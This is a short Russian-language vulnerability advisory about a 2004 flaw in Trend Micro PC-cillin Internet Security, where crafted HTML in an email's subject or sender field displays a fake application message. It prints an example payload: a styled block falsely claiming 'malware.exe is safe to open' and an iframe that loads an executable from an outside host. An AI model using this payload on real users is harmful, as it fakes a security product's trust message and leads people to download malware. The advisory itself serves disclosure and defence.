Подмена сообщения в Trend Micro PC-cillin Internet Security
- Дата публикации:
- 09.06.2004
- Дата изменения:
- 16.10.2006
- Всего просмотров:
- 876
- Опасность:
- Высокая
- Наличие исправления:
- Количество уязвимостей:
- 1
- CVSSv2 рейтинг:
- CVE ID:
- Нет данных
- Вектор эксплуатации:
- Воздействие:
- CWE ID:
- Нет данных
- Наличие эксплоита:
- Нет данных
- Уязвимые продукты:
Уязвимые версии: Trend Micro PC-cillin Internet Security 2004
Описание: Уязвимость обнаружена в Trend Micro PC-cillin Internet Security. Удаленный пользователь может послать e-mail, чтобы подменить сообщения от приложения и потенциально выполнить произвольный код.
Удаленный пользователь может послать специально сформированное HMTL в полях subject или sender, чтобы отобразить сообщение, которое будет выглядеть как правильное сообщение, сгенерированное приложением. Пример:
style="position:absolute;top:25;left:10;height:300pt;width:300pt; z-index:+100;font-family:Verdana;font-weight: bold;font-size: 12pt;font-color:green">Trend Micro Internet Security confirms this file <br>malware.exe is safe to open. Proceed.</div><iframe src="http://www.malware.com/malware.exe">
Пример/Эксплоит: http://www.malware.com/micronot.png
URL производителя:http://www.trendmicro.com/
Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.
Ссылки:
TREND MICRO: The Protector Becomes The Vector Take II